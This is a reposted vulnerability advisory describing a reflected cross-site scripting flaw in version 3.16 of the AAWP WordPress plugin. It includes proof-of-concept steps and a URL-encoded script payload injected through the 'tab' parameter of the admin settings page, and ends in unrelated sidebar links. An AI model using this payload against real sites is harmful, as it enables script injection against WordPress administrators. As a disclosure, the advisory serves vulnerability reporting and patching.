当前位置:网站首页>WordPress aawp 3.16 cross site scripting
WordPress aawp 3.16 cross site scripting
2022-06-23 06:07:00 【Khan security team】
supply Business Homepage :https://getaawp.com/
Software link :https://getaawp.com/
edition :3.16
Tested on :Windows 10 - Chrome、WordPress 5.8.2
Proof of concept :
1- Install and activate AAWP 3.16 plug-in unit .
2- go to https://localhost.com/wp-admin/admin.php?page=aawp-settings&tab=XXXX
3- add to payload To Tab,XSS Payload:%22onclick%3Dprompt%288%29%3E%3Csvg%2Fonload%3Dprompt%288%29%3E%22%40x.y
4- XSS Has been triggered .
Go to this URL “http://localhost/wp-admin/admin.php?page=aawp-settings&tab=%22onclick%3Dprompt%288%29%3E%3Csvg%2Fonload%3Dprompt%288%29%3E%22 %40x.y" XSS Will trigger .
边栏推荐
- jvm-02. Guarantee of orderliness
- 云原生数据库是未来
- 编址和编址单位
- Basic calculator II for leetcode topic analysis
- Android handler memory leak kotlin memory leak handling
- jvm-04. Object's memory layout
- Kotlin android简单Activity跳转、handler和thread简单配合使用
- Prometheus, incluxdb2.2 installation and flume_ Export download compile use
- 阿里云 ACK One、ACK 云原生 AI 套件新发布,解决算力时代下场景化需求
- 如何指定pig-register项目日志的输出路径
猜你喜欢
android Handler内存泄露 kotlin内存泄露处理
True MySQL interview question (XXII) -- condition screening and grouping screening after table connection
学习太极创客 — ESP8226 (十一)用 WiFiManager 库配网
Real MySQL interview questions (25) -- common group comparison scenarios
Cloud native database is the future
Wireshark TS | video app cannot play
【Cocos2d-x】截图分享功能
New classes are launched | 5 minutes each time, you can easily play with Alibaba cloud container service!
jvm-06. Garbage collector
【Cocos2d-x】自定义环形菜单
随机推荐
Pat class B 1010 C language
PAT 乙等 1018 C语言
[database backup] complete the backup of MySQL database through scheduled tasks
jvm-03.jvm内存模型
密码学系列之:PKI的证书格式表示X.509
Add and multiply two polynomials using linked list
Excel sheet column number for leetcode topic resolution
【DaVinci Developer专题】-42-如何生成APP SWC的Template和Header文件
Layer 2技术方案进展情况
Real MySQL interview question (23) -- pinduoduo ball game analysis
最优传输理论下对抗攻击可解释性
PAT 乙等 1016 C语言
SQL statement error caused by the same SQL table name and function name.
如何为 Arduino IDE 安装添加库
jvm-06. Garbage collector
Centos7 deploy radius service -freeradius-3.0.13-15 EL7 integrating MySQL
Pat class B 1016 C language
Causes and methods of exe flash back
jvm-04.对象的内存布局
使用链表实现两个多项式相加和相乘